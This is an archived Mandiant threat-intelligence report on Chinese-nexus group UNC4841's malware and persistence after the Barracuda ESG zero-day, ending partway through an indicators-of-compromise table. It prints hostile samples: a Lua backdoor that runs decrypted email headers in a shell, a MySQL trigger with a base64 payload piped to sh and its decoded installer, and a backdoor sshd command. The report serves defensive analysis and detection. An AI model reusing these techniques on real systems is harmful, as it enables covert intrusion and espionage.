{ "id": "643a6b33-5e52-49a2-85e9-dd35140718ea", "created_at": "2026-04-06T00:13:37.291108Z", "updated_at": "2026-04-10T03:30:25.660407Z", "deleted_at": null, "sha1_hash": "03f2b901f28993757ec9aaefff97e443035b7190", "title": "Diving Deep into UNC4841 Operations Following Barracuda ESG Zero-Day Remediation (CVE-2023-2868) | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2283204, "plain_text": "Diving Deep into UNC4841 Operations Following Barracuda ESG Zero-Day Remediation (CVE-2023-2868) | Mandiant\r\nBy Mandiant\r\nPublished: 2023-08-29 · Archived: 2026-04-02 12:45:42 UTC\r\nWritten by: Austin Larsen, John Palmisano, John Wolfram, Mathew Potaczek, Michael Raggi\r\nUPDATE (Aug. 21, 2024): This post has been updated to remove four indicators of compromise (IOC) in the Domains\r\nsection. Based on further research, we have determined that there was insufficent evidence to confirm if these IOCs were\r\nrelated to this campaign.\r\nOn June 15, 2023, Mandiant released a blog post detailing an 8-month-long global espionage campaign conducted by a\r\nChinese-nexus threat group tracked as UNC4841. In this follow-up blog post, we will detail additional tactics, techniques,\r\nand procedures (TTPs) employed by UNC4841 that have since been uncovered through Mandiant’s incident response\r\nengagements, as well as through collaborative efforts with Barracuda Networks and our International Government partners.\r\nOver the course of this blog post, Mandiant will detail how UNC4841 has continued to show sophistication and adaptability\r\nin response to remediation efforts. Specifically, UNC4841 deployed new and novel malware designed to maintain presence\r\nat a small subset of high priority targets that it compromised either before the patch was released, or shortly following\r\nBarracuda’s remediation guidance. We’ll also showcase how UNC4841’s deployment select backdoors suggests this threat\r\nactor anticipated, and prepared for remediation efforts, by creating tooling in advance to remain embedded in high-value\r\ntargets, should the campaign be compromised.\r\nFurthermore, Mandiant will provide additional insights into the overall campaign timeline as well as a deeper look into\r\nUNC4841’s targeting, as observed through investigations at downstream customers, further strengthening the case for ties\r\nbetween UNC4841 and the People’s Republic of China.\r\nSince Barracuda released a patch to ESG appliances on May 20, 2023, Mandiant and Barracuda have not identified evidence\r\nof successful exploitation of CVE-2023-2868 resulting in any newly compromised physical or virtual ESG appliances. Only\r\na limited number of ESG appliances worldwide were compromised (5% of ESG appliances), and impacted customers have\r\nbeen notified to replace the appliances. No other Barracuda product, including Barracuda’s SaaS email solutions, were\r\nimpacted by this vulnerability.\r\nMandiant and Barracuda investigations into previously compromised appliances confirmed UNC4841 deployed additional\r\nmalware to a subset of devices and conducted additional post-exploitation activities.\r\nMandiant assesses that, at the time of writing, a limited number of previously impacted victims remain at risk due to this\r\ncampaign. UNC4841 has shown an interest in a subset of priority victims - it is on these victim’s appliances that additional\r\nmalware, such as the backdoor DEPTHCHARGE, was deployed to maintain persistence in response to remediation efforts.\r\nMandiant and Barracuda have reached out to individual victims where such activity has been identified. Mandiant’s\r\nrecommendations remain unchanged — victims impacted by this campaign should contact Barracuda support and replace\r\nthe compromised appliance.\r\nCampaign Timeline\r\nSince our initial blog post, Mandiant has assembled and analyzed an exhaustive timeline of all identified UNC4841 activity\r\nobserved at victims impacted by the successful exploitation of CVE-2023-2868. As depicted in Figure 1, the campaign\r\nspanned the timeframe between October 2022 and June 2023, with an initial surge of CVE-2023-2868 exploitation activity\r\noccurring in early November 2022.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 1 of 23\n\nFigure 1: Identified UNC4841 activity (blue) and victims (red) over the duration of the campaign\r\nThrough our analysis of the campaign, Mandiant identified a distinct fall off in activity from approximately January 20 to\r\nJanuary 22, 2023, a period that coincides with the beginning of the Chinese New Year — a national holiday observed within\r\nthe People’s Republic of China. Additionally, further analysis of the timeline identified two surges in activity that followed\r\nBarracuda’s initial remediation efforts and public notification on May 23, 2023. The first surge occurred in the days\r\nimmediately following the notification, where the actor retooled malware and changed persistence methods as detailed in\r\nour previous blog. This was followed by a second, previously undisclosed wave, that began in early June 2023. In this\r\nsecond wave, Mandiant discovered the actor attempting to maintain access to compromised environments via the\r\ndeployment of the new malware families SKIPJACK, DEPTHCHARGE, and FOXTROT / FOXGLOVE. This second surge\r\nrepresented the highest intensity of UNC4841 activity identified by Mandiant across the entire campaign, demonstrating\r\nUNC4841’s determination in preserving access to specific victim environments.\r\nTargeted Tooling\r\nUNC4841 is a well-resourced actor that has utilized a wide range of malware and purpose-built tooling to enable their global\r\nespionage operations. One theme that has become apparent as our investigation has progressed is the selective deployment\r\nof specific malware families at high priority targets. The three code families we have observed being selectively deployed\r\nare SKIPJACK, DEPTHCHARGE, and FOXTROT / FOXGLOVE. Each of these malware families represent a level of\r\nincreasing selectivity in their deployment.\r\nSKIPJACK\r\nSKIPJACK is a passive backdoor implemented by trojanizing legitimate Barracuda ESG modules by injecting malicious\r\nLua code. Through the injected code, SKIPJACK establishes its backdoor capabilities by registering a listener for specific\r\nincoming email headers and subjects, and then decoding and executing the content of them. Mandiant has observed\r\nvariations of SKIPJACK that utilize both the Content-ID and X-Barracuda-Spam-Info email header fields, an example of\r\nwhich can be seen in the following code snippet.\r\nif hdr:name() == \"Content-ID\" then\r\n if hdr:body() ~= nil then\r\n if string.match(hdr:body(), \"^[%w%+/=\\r\\n]+$\") then\r\n io.popen(\"echo \" \" .. hdr:body() .. \"\" | openssl aes-256-cbc -d -A -a -nosalt -K \u003cREDACTED\u003e -iv \u003cR\r\n End\r\n end\r\nend\r\nFigure 2: SKIPJACK Listener\r\nAs observed in the code snippet, the injected SKIPJACK code inspects whether the Content-ID header exists, and that it\r\ncontains characters that would be present in a Base64 encoded string. When the condition is met, it proceeds to AES-256\r\ndecrypt and Base64 decode the header body, and then pipe the output to a system shell for execution.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 2 of 23\n\nAround the time of Barracuda's initial notification regarding CVE-2023-2868, Mandiant observed UNC4841 creating bash\r\nscripts on previously compromised appliances with the filename of `mknod` in the path `/boot/os_tools/`. The `mknod` bash\r\nscript checks whether the `mod_content.lua` script on the compromised appliance contains the string `OpenSSL`, and if not\r\nfound, injects the code snippet in Figure 2 into the mod_content.lua script, effectively backdooring the legitimate Barracuda\r\nESG module.\r\nOf these three malware families, UNC4841 most widely deployed SKIPJACK, which was observed on roughly 5.8 percent\r\nof all compromised ESG appliances. UNC4841 primarily targeted government and technology organizations with\r\nSKIPJACK; however, multiple other verticals were observed being targeted.\r\nFigure 3: SKIPJACK sector distribution\r\nAdditionally, of all the malware families deployed by UNC4841 in this campaign, Mandiant found that SKIPJACK had the\r\nmost variants. Although we identified evidence of many different SKIPJACK bash scripts existing on compromised\r\nappliances, we were not able to recover all instances of the malware. Based on the samples we did obtain, we suspect that\r\neach of these unrecovered variants contained different SKIPJACK code that utilized different sections within an email\r\nmessage to hide its encrypted command and achieve the same functionality.\r\nDEPTHCHARGE\r\nAnother malware family Mandiant observed being selectively deployed by UNC4841 was a passive backdoor we named\r\nDEPTHCHARGE. DEPTHCHARGE, which is tracked by CISA as SUBMARINE, is packaged as a Linux shared object\r\nlibrary, which is pre-loaded into the Barracuda SMTP (BSMTP) daemon using LD_PRELOAD. DEPTHCHARGE listens\r\npassively to receive encrypted commands, which it decrypts with OpenSSL and executes before sending the results,\r\nmasqueraded as SMTP commands, back to the command and control (C2) server. DEPTHCHARGE is installed and\r\npersisted through a complex execution chain, which the actor crafted to enable infection of re-issued or clean appliances\r\nwhen the victim restored backup configurations from a previously compromised device. Figure 4 provides a depiction of the\r\nDEPTHCHARGE execution chain.\r\nFigure 4: DEPTHCHARGE execution chain\r\nThe first stage of the DEPTHCHARGE execution chain existed in a file named `config.TRG`, which defines a malicious\r\ntrigger (named `cuda` or `cuda_trigger`) in the MySQL database that stores the configuration for the Barracuda ESG\r\nappliance.\r\nTYPE=TRIGGERS\r\ntriggers='CREATE TRIGGER cuda\\nBEFORE DELETE ON config\\nFOR EACH ROW\\nBEGIN\\n DECLARE i INT;\\n SET i = 1;\\n IF i\r\n-n Y2F0IC92YXIvdG1wL3IgfCBiYXNlNjQgLWQgLWkgfCB0YXIgLXp4IC1DIC92YXIvdG1wCm5va\r\nHVwIGJhc2ggL3Zhci90bXAvcnVuLnNoICAgMzExNTMgICAgPi9kZXYvbnVsbCAyPiYxICYKcm0gLWYgL3Jvb3QvbWFjaGluZVxgKg== | base64 -d | sh\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 3 of 23\n\nsql_modes=0\r\ndefiners='root@localhost'\r\nFigure 5: DEPTHCHARGE trigger\r\ncat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp\r\nnohup bash /var/tmp/run.sh 31153 \u003e/dev/null 2\u003e\u00261 \u0026\r\nrm -f /root/machine\\`*\r\nFigure 6: DEPTHCHARGE decoded installer script\r\nThe trigger is executed before a row is removed from the configuration database, an action which occurs frequently and at\r\nthe time of restoration of a previous Barracuda ESG configuration. The first part of the trigger writes a Base64 payload to\r\n`/var/tmp/r`; a TAR archive that contains an installer shell script and the final DEPTHCHARGE backdoor payload. The\r\nremaining components of the trigger write a script to disk that decompresses this archive, run the installer script inside, and\r\nthen remove the file on disk. However, it is not possible to execute a script directly from the MySQL trigger. Therefore, in\r\norder to execute the installer script, UNC4841 specially crafted a filename that would cause other components of the\r\nBarracuda ESG’s codebase that used the two-argument form of Perl’s open( ) function to execute commands (shown inside\r\nthe backticks). Ultimately, this novel approach enabled UNC4841 to achieve command execution from the MySQL trigger\r\nand launch the DEPTHCHARGE script. The fact that UNC4841 identified and operationalized this complex execution path\r\nsuggests that they had extensive knowledge of the device and had researched internal components of the Barracuda ESG\r\nappliance.\r\nThe installer script `run.sh` is executed with an argument that specifies the DEPTHCHARGE `BSMTP_ID` configuration\r\nvalue (discussed as follows). The script is responsible for moving the DEPTHCHARGE payload to a legitimate directory on\r\nthe appliance, and modifying the SMTP configuration file to pre-load the malware with the given BSMTP_ID configuration\r\nvalue upon execution of the BSMTP daemon. It also creates additional scripts that sleep for two minutes prior to execution,\r\ncheck if the pre-load persistence is present, and install it into the SMTP configuration file if it is not found. To further blend\r\ninto legitimate activity, some variants of the script were also found to timestomp the malware files by inheriting timestamps\r\nfrom legitimate files on the system using the `touch` command.\r\nThe DEPTHCHARGE backdoor can accept incoming TCP connections. It checks if the TCP source port of the client is\r\nequal to the value in the `BSMTP_ID` environment variable, and if so executes its backdoor capability as a Linux daemon.\r\nDEPTHCHARGE first connects to the appliance's SMTP port (127.0.0.1:25) to retrieve the appliance’s genuine SMTP\r\nbanner, which it sends back to the attacker. This is likely used as an SMTP greeting message and to verify the identity of the\r\nappliance to which they are connecting.\r\nThe malware is then able to receive encrypted commands that masquerade as SMTP EHLO commands, which are preceded\r\nwith the string “ehlo” followed by a space. The encrypted commands are base64 decoded and AES decrypted with OpenSSL\r\nbefore being executed. The malware sends the results back to the attacker, again masquerading it as SMTP traffic:\r\n250-mail2.eccentric.duck Hello \u003ccommand body\u003e [\u003cclient's IP address string\u003e], pleased to meet you\r\n250-SIZE 100000000\r\n250-PIPELINING\r\n250-8BITMIME\r\n250 HELP\r\nFigure 7: DEPTHCHARGE SMTP greeting\r\nThe SMTP reply sent by DEPTHCHARGE in response to a SMTP EHLO command contains the local hostname of\r\n“mail2.eccentric.duck”. This hostname is a hardcoded string and does not relate to any public registered domain name.\r\nIt was common practice for impacted victims to export their configuration from compromised appliances so it could be\r\nrestored into a clean one. Therefore, if the DEPTHCHARGE trigger was present in the exported configuration, it would\r\neffectively enable UNC4841 to infect the clean device with the DEPTHCHARGE backdoor through this execution chain,\r\nand potentially maintain access even after complete replacement of the appliance. Mandiant and Barracuda Networks\r\nidentified instances where this may have occurred and notified victims accordingly. Additionally, Mandiant is aware that in\r\nsome cases, this MySQL configuration database may contain plaintext passwords for user accounts. In these instances, we\r\nsuspect the actor was harvesting these credentials for lateral movement purposes.\r\nThe earliest evidence of UNC4841 deploying DEPTHCHARGE occurred on May 30, 2023, roughly one week after\r\nBarracuda’s initial notification. Mandiant observed UNC4841 rapidly deploy DEPTHCHARGE to select targets following\r\nBarracuda’s announcement that RMA was the recommended response action. This capability and its deployment suggests\r\nthat UNC4841 anticipated and was prepared for remediation efforts with tooling and TTPs designed to enable them to\r\npersist on high value targets. It also suggests that despite this operation's global coverage, it was not opportunistic, and that\r\nUNC4841 had adequate planning and funding to anticipate and prepare for contingencies that could potentially disrupt their\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 4 of 23\n\naccess to target networks. Over the course of the investigation to date, Mandiant has identified UNC4841 deploying\r\nDEPTHCHARGE to roughly 2.64 percent of compromised appliances. These victims included U.S. and foreign government\r\nentities, as well as high tech and information technology providers.\r\nFigure 8: DEPTHCHARGE sector distribution\r\nFOXTROT / FOXGLOVE\r\nThe final malware family Mandiant observed being selectively deployed by UNC4841 was FOXTROT / FOXGLOVE.\r\nFOXGLOVE is a launcher written in C that executes the hardcoded path of FOXTROT. The payload is executed along with\r\nadditional encrypted arguments for the C2, port, secret key, and jitter. FOXGLOVE uses a combination of Base64, Mod(13),\r\nand XOR with a hard-coded key to encrypt arguments.\r\nFigure 9: FOXGLOVE encryption routine\r\nFOXGLOVE is implemented to be configurable, as the execution path and arguments can easily be changed.\r\n/usr/share/foxdoor/foxdoor_shell shell -t \u003cEncrypted C2\u003e -p \u003cEncrypted Port\u003e -s \u003cEncrypted Secret\u003e -r \u003cJitter\u003e\r\nFigure 10: FOXGLOVE execution\r\nFOXTROT is a backdoor written in C++ that communicates via TCP and is able to be used as a proxy. Supported backdoor\r\ncommands include keystroke capture, shell command execution, reverse shell creation, and file transfer.\r\nFOXTROT contains overlaps to REPTILE shell open source code. FOXTROT notably makes use of the default sequence\r\n`;7(Zu9YTsA7qQ#vw` as an acknowledgement token, and to signal session termination. FOXTROT, however, also includes\r\nbackdoor commands and functionality not present in REPTILE.\r\nFOXTROT and FOXGLOVE are also notable in that they are the only malware families observed being used by UNC4841\r\nthat were not specifically designed for Barracuda ESGs. Based on functionality, FOXTROT was likely also intended to be\r\ndeployed to other Linux-based devices within a network to enable lateral movement and credential theft. Additionally,\r\nFOXGLOVE and FOXTROT were the most selectively deployed of all the malware families used by UNC4841. At this\r\ntime, Mandiant has only observed UNC4841 deploy FOXTROT and FOXGLOVE at government or government related\r\norganizations that were high priority targets for the PRC.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 5 of 23\n\nFigure 11: FOXTROT / FOXGLOVE sector distribution\r\nLateral Movement\r\nFollowing Barracuda’s public disclosure of CVE-2023-2868, Mandiant identified UNC4841 performing internal\r\nreconnaissance and subsequent lateral movement actions within a limited number of victim environments.\r\nOn May 16, 2023, Mandiant observed the first evidence of UNC4841 attempting to perform internal reconnaissance on a\r\nsmall number of victims' internal networks in which Mandiant was responding. In these cases, the actor utilized open-source\r\ntools such as fscan to perform host detection, port scanning, web fingerprint identification, web vulnerability scanning,\r\ndomain control identification, and other reconnaissance actions. In one environment, the actor scanned more than 50 subnets\r\nover the course of nine days, with approximately 80 percent of these being completed in one day. Figure 12 shows an\r\nexample output from the fscan tool recovered from a compromised ESG appliance.\r\n\u003credacted\u003e::25 open\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:587 open\r\n\u003credacted\u003e:443 open\r\n[*] NetInfo:\r\n[*]\u003credacted\u003e\r\n [-\u003e]\u003credacted\u003e\r\n [-\u003e]\u003credacted\u003e\r\n[*] WebTitle: https://\u003credacted\u003e code:200 len:701 title:IIS Windows Server\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:443 open\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 65\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 26\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 13\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:587 open\r\n\u003credacted\u003e:53 open\r\n\u003credacted\u003e:389 open\r\nIn addition to the reconnaissance actions, Mandiant also observed UNC4841 attempting to move laterally from impacted\r\nESG appliances within this same time period. Based on the activity observed over the course of the investigation, Mandiant\r\nbelieves UNC4841 was likely utilizing the contents of messages stored within the mstore, a temporary storage location on\r\nthe ESG, to harvest credentials. In multiple instances, Mandiant identified cleartext credentials contained within the contents\r\nof messages stored on the ESG that UNC4841 subsequently used to successfully access the account through Outlook Web\r\nAccess (OWA) on the first attempt.\r\nIn more than one case, Mandiant observed UNC4841 utilizing OWA to attempt to log in to mailboxes for users within the\r\nvictim organization. In one case, a relatively low number of unsuccessful OWA access attempts resulted in the lockout of a\r\nlimited number of accounts. In the cases where UNC4841 was able to obtain unauthorized access to a limited number of\r\naccounts, Mandiant did not observe UNC4841 send any email from the compromised account. Mandiant assesses that\r\nUNC4841 was likely attempting to maintain access to compromised users’ mailboxes to gather information for espionage\r\npurposes post Barracuda remediation.\r\nIn addition to attempts to move laterally to Active Directory and OWA, Mandiant also observed attempts by UNC4841 to\r\nmove laterally via SSH to VPNs, Proxy Servers, and other edge appliances on the victims network.\r\nMandiant also identified accounts created by UNC4841 within the etc/passwd file on roughly five percent of the previously\r\nimpacted appliances, as another form of remote access. Account names followed a consistent format, containing four (4)\r\nrandomly generated characters. The actor would then spawn a ssh daemon process to listen on a specific high port and allow\r\nlogin from this newly created user account as another means to maintain backdoor access to compromised appliances. An\r\nexample of the command is shown as follows:\r\n/usr/sbin/sshd -p 48645 -oAllowUsers=rfvN\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 6 of 23\n\nIn one case, Mandiant identified UNC4841 successfully accessing a Windows Server Update Services (WSUS) server\r\nutilizing a domain administrator account identified within the mstore on an ESG appliance. The access to WSUS is notable\r\nas Mandiant has observed other China-nexus espionage actors deploying malware on a WSUS server to inject fake updates\r\nfor remote code execution in efforts to steal data from government entities.\r\nTargeting\r\nIn the two months since our introduction of UNC4841, Mandiant has also come to better understand UNC4841’s targeting of\r\nESG appliances and their primary targets based on their selectivity in follow-on operations. Overall, Mandiant has observed\r\ntargeted organizations across public and private sectors worldwide appear to be impacted by UNC4841 tools. While the\r\nmajority of exploitation activity appears to impact the Americas, that may partially reflect the product’s customer base\r\n(Figure 13).\r\nFigure 13: Affected organizations by region\r\nOrganizations observed to be impacted by UNC4841 sit in a wide variety of verticals, with the primary targets including\r\nnational governments, high tech and information technology entities, local governments, telecommunications providers,\r\nmanufacturing entities, and colleges and universities. Twenty six specific verticals were observed that spanned a broad\r\nspectrum of functions (Figure 14). Noteworthy sectors that were included in minority targeted segments included healthcare\r\nand biotechnology, public health, aerospace and defense, and semiconductors.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 7 of 23\n\nFigure 14: Sector breakdown, percentage of impacted organizations\r\nAlmost a third of identified affected organizations were government agencies. As stated in Mandiant’s earlier publication,\r\nshell scripts were uncovered that targeted email domains and users from ASEAN Ministry of Foreign Affairs, as well as\r\nforeign trade offices and academic research organizations in Taiwan and Hong Kong. In addition, the actors searched for\r\nemail accounts belonging to employees of a government with political or strategic interest to the PRC while this victim\r\ngovernment was participating in high-level, diplomatic meetings with other countries. This suggests targeted exfiltration was\r\nprioritized for specific high value geopolitical and economic users. A distinct prioritization of government agencies\r\nalongside high tech and information technology targets was also observed when examining UNC4841 tools deployed\r\nfollowing Barracuda’s patching and initial disclosure of CVE-2023-2868. These factors support the assessment that the\r\ncampaign had an espionage motivation.\r\nFigure 15: Government agencies worldwide appear to have been disproportionately targeted\r\nFollowing Barracuda’s announcement regarding CVE-2023-2868 and remediation efforts on May 23, 2023, new malware\r\nwas deployed by the threat actor beginning on May 22, 2023. These malware families included SKIPJACK,\r\nDEPTHCHARGE, FOXGLOVE, FOXTROT, and a new version of SEASPY tracked as SEASPY V2. The first new payload\r\nobserved was SEASPY v2 on May 22, 2023, followed by DEPTHCHARGE, FOXGLOVE, and FOXTROT from May 30,\r\n2023 through early June. Interestingly, organizations that received these post-remediation malware families were weighted\r\ntowards government (national), high tech, and information technology sectors. This may suggest a threat actor prioritization\r\ntowards conventional espionage targets, and maintaining access to IT and managed service providers.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 8 of 23\n\nFigure 16: Post-remediation UNC4841 malware deployment by sector\r\nNotably, among North American identified affected organizations, there were numerous state, provincial, county, tribal, city,\r\nand town offices that were targeted in this campaign. These organizations included municipal offices, law enforcement\r\noffices, judiciaries of varying levels, social service offices, and several incorporated towns. While overall local government\r\ntargeting comprises just under seven percent of all identified affected organizations, this statistic increases to nearly\r\nseventeen percent when compared to U.S.-based targeting alone. In some instances, targeted entities had populations below\r\n10,000 individuals. Local government targeting occurred mostly in the initial months of CVE-2023-2868 exploitation, with\r\nthe majority of observed compromises beginning from October through December 2022. The volume of local government\r\norganizations impacted by UNC4841 post-remediation tools has since fallen to only 8 percent of observed impacted\r\norganizations. This decline may represent an evolving operational priority for UNC4841 over the duration of sustained\r\nthreat activity.\r\nRegional information technology providers in the United States and Europe experienced a statistically notable volume of\r\ntargeting among early instances of exploitation in which SALTWATER, SEASPY, and SEASIDE were delivered. These\r\npayloads were delivered as part of the initial compromise by UNC4841 without further actions on objectives carried out on\r\nthe infected device. Mandiant does not maintain thorough visibility into adversary actions during the earlier stages of the\r\ncampaign. However, we note that several indications were discovered during incident response, which demonstrate the\r\nactors were removing traces of their malicious activity on impacted devices. A possible conclusion of these three malware\r\nfamilies being observed in isolation is adversaries have not yet prioritized the infected appliances for further compromise\r\nand deployment of later stage tools attributed to UNC4841. Alternatively, we recognize that subsequent tooling and\r\nindications of malicious activity may have been removed by the actors prior to the start of remediation engagements.\r\nFrom October 2022 to February 2023, the heightened volume of impacted IT and MSP providers with solely the initial\r\npayloads delivered may have been an attempt by UNC4841 to establish an initial foothold within this type of Barracuda\r\nESG environment. Few of these impacted targets received later stage payloads or were associated with targeted commands\r\nthat sought to exfiltrate data pertaining to specific users. Mandiant assesses with low confidence that this may suggest these\r\norganizations were targeted in an attempt to maximize access to domains managed by Barracuda ESG servers, rather than\r\nthe IT providers being the intended final target of exploitation. Barracuda ESG allows the management of numerous email\r\ndomains for the scanning of inbound email attachments, and information technology providers and managed service\r\nproviders may be positioned to manage a greater variety of downstream customer email domains when compared to a single\r\nenterprise server. Additionally, as previously noted, high tech and information technology providers were the second most\r\ntargeted sector by UNC4841 post-remediation tooling.\r\nA deeper examination of identified affected organizations showed a recurring targeting of sectors that are key to global\r\ngovernments maintaining a competitive technological and economic edge in the face of impending strategic state deadlines.\r\nEntities were observed within the semiconductor, public health, aerospace, artificial intelligence/autonomous vehicles, and\r\nrare earth metal production sectors. Further, religious based organizations were impacted by UNC4841 campaigns. A cluster\r\nof organizations with mission-based aid or stated evangelical missions that impact China (and Chinese claimed geographies\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 9 of 23\n\nsuch as Hong Kong and Taiwan) were observed being targeted with the initial stages of malware utilized by this threat actor.\r\nUnlike numerous impacted organizations that align with traditional espionage requirements, these entities only received\r\nearly stage implants such as SALTWATER, SEASPY, and SEASIDE. This may suggest a lower priority among UNC4841\r\ncollection requirements with evidence of deeper compromise, persistence, and exfiltration being observed among entities\r\naligning with more conventional geopolitical, defense, and technology related mandates.\r\nBased on the evidence available at the time of analysis, earliest compromises appear to have occurred on a small subset of\r\nappliances geolocated to mainland China. The C2 communications utilized during this early set of compromises also\r\nleveraged port 8080, while later compromises that occurred globally almost entirely leveraged port 443 or port 25. \r\nAttribution \r\nMandiant has previously assessed with high confidence that UNC4841 conducts espionage activity in support of the\r\nPeople’s Republic of China. Our assessment has not changed and has now been corroborated by independent assessments\r\nfrom government agencies. As we mentioned in our first blog post, several overlaps with other China-nexus actors have\r\nbeen identified throughout our investigation. However, Mandiant has not attributed activity tracked as UNC4841 to a\r\npreviously known threat actor.\r\nHigher-level Trends in Chinese Cyber Espionage Operations\r\nEarly in our investigation, we identified overlaps in infrastructure used by UNC4841 with that which we have associated\r\nwith UNC2286, another China-nexus actor that we have observed active since at least 2019 and which has heavily targeted\r\norganizations in the Southeast Asia region. Activity Mandiant has attributed to UNC2286 overlaps with public reporting\r\non GhostEmperor (Kaspersky) and FamousSparrow (ESET). While this finding does indicate a connection in the\r\ninfrastructure used by both groups, it is likely an artifact of a shared infrastructure anonymization service or an infrastructure\r\nprovider that is common between them. \r\nAdditionally, Mandiant has recently observed another sophisticated espionage focused China-nexus actor, UNC3886,\r\ndeploying custom malware based on modified REPTILE source code - similar to FOXTROT. A recent UNC3886 campaign\r\nleveraged a zero-day exploit for Fortinet appliances as well as an ecosystem of custom malware which included UNC3886’s\r\nbackdoor CASTLETAP, which is adapted from REPTILE and designed to be utilized on FortiGate appliances. CASTLETAP\r\nachieves functionality similar to SEASPY and is also designed to passively listen for magic packets that activate the\r\nbackdoor functionality and connect back to a C2 server with SSL encryption. Other malware families deployed by\r\nUNC3886 have also shown similar characteristics to those deployed by UNC4841. For example, DRIEDMOAT is another\r\nsimilar passive backdoor that has been observed with an embedded certificate stolen from the compromised appliance that it\r\nuses to encrypt its C2 communications, much like the technique we observed from UNC4841.\r\nShared infrastructure and techniques for anonymization are common amongst Chinese cyber espionage actors, as is shared\r\ntooling and likely malware development resources. Mandiant assesses that these observations are evidence of the higher\r\nlevel trends we have observed in Chinese cyber espionage and the evolution toward more purposeful, stealthy, and effective\r\noperations that avoid detection and complicate attribution. It is likely that we will continue to observe Chinese cyber\r\nespionage operations targeting edge infrastructure with zero-day vulnerabilities and the deployment of malware customized\r\nto specific appliance ecosystems.\r\nOutlook and Implications\r\nOver the course of the investigation, UNC4841 has proven to be highly responsive to defensive efforts and has actively\r\nmodified TTPs to maintain access within victim environments to continue their espionage operation. Mandiant strongly\r\nrecommends impacted Barracuda customers continue to hunt for UNC4841 activity within networks impacted by a\r\ncompromised ESG. Due to their demonstrated sophistication and proven desire to maintain access, Mandiant expects\r\nUNC4841 to continue to alter their TTPs and modify their toolkit as network defenders continue to take action against this\r\nadversary, and their activity is further exposed by the security community. Mandiant anticipates UNC4841 will continue to\r\ntarget edge devices in the future. In order to aid in the hunting UNC4841 activity, IOCs and detection rules can be found in\r\nthe sections that follow.\r\nIf you were impacted by this campaign, Mandiant recommends you contact the FBI at sf-barracudacve@fbi.gov. \r\nAcknowledgements\r\nWe would like to thank the U.S. Cybersecurity \u0026 Infrastructure Security Agency (CISA) for their continued partnership and\r\ncontributions to this report, as well as the Federal Bureau of Investigation (FBI) for their on-going collaboration and\r\nassistance in notifying impacted organizations. We would also like to thank the Australian Signals Directorate’s (ASD)\r\nAustralian Cyber Security Centre (ACSC) for assistance in notifying victims. Additionally, we would like to thank\r\nBarracuda Networks for their decisive actions, transparency and partnership following the exploitation of CVE-2023-2868\r\nby UNC4841.\r\nIndicators of Compromise (IOCs)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 10 of 23\n\nNetwork IOCs\r\nIP Address ASN NetBlock Location\r\n101.229.146.218 4812 China Telecom CN\r\n103.146.179.101 136933 Gigabitbank Global HK\r\n103.27.108.62 132883 Topway Global Limited HK\r\n103.77.192.87 10222 Multibyte Info Technology Limited HK\r\n103.146.179.69 10222 Multibyte Info Technology Limited HK\r\n103.77.192.13 10222 Multibyte Info Technology Limited HK\r\n103.77.192.88 10222 Multibyte Info Technology Limited HK\r\n103.93.78.142 61414 Edgenap Ltd JP\r\n104.156.229.226 20473 Choopa, LLC US\r\n104.223.20.222 8100 CloudVPS US\r\n107.148.149.156 399195 Pegtechinc-ap-04 US\r\n107.148.219.227 54600 Peg Tech US\r\n107.148.219.53 54600 Peg Tech US\r\n107.148.219.54 54600 Peg Tech US\r\n107.148.219.55 54600 Peg Tech US\r\n107.148.223.196 54600 Peg Tech US\r\n107.173.62.158 20278 Nexeon Technologies US\r\n113.52.106.3 4609 Companhia de Telecomunicacoes de Macau SARL HK\r\n137.175.19.25 54600 Peg Tech US\r\n137.175.28.251 54600 Peg Tech US\r\n137.175.30.36 54600 Peg Tech US\r\n137.175.30.86 54600 Peg Tech US\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 11 of 23\n\n137.175.51.147 54600 Peg Tech US\r\n137.175.53.17 54600 Peg Tech US\r\n137.175.53.170 54600 Peg Tech US\r\n137.175.53.218 54600 Peg Tech US\r\n137.175.60.252 54600 Peg Tech US\r\n137.175.60.253 54600 Peg Tech US\r\n137.175.78.66 54600 Peg Tech US\r\n139.84.227.9 20473 Choopa, LLC ZA\r\n155.94.160.72 8100 CloudVPS US\r\n155.94.160.95 8100 ASN-QUADRANET-GLOBAL US\r\n182.239.114.135 9231 China Mobile Hong Kong HK\r\n182.239.114.254 9231 China Mobile Hong Kong HK\r\n185.243.41.209 61414 Edgenap Ltd JP\r\n192.74.226.142 54600 Peg Tech CN\r\n192.74.254.229 54600 Peg Tech US\r\n195.234.82.132 202422 G-Core Labs S.A. US\r\n198.2.254.219 54600 Peg Tech US\r\n198.2.254.220 54600 Peg Tech US\r\n198.2.254.221 54600 Peg Tech US\r\n198.2.254.222 54600 Peg Tech US\r\n198.2.254.223 54600 Peg Tech US\r\n199.247.23.80 20473 Choopa, LLC DE\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 12 of 23\n\n213.156.153.34 202422 G-Core Labs S.A. US\r\n216.238.112.82 20473 Choopa, 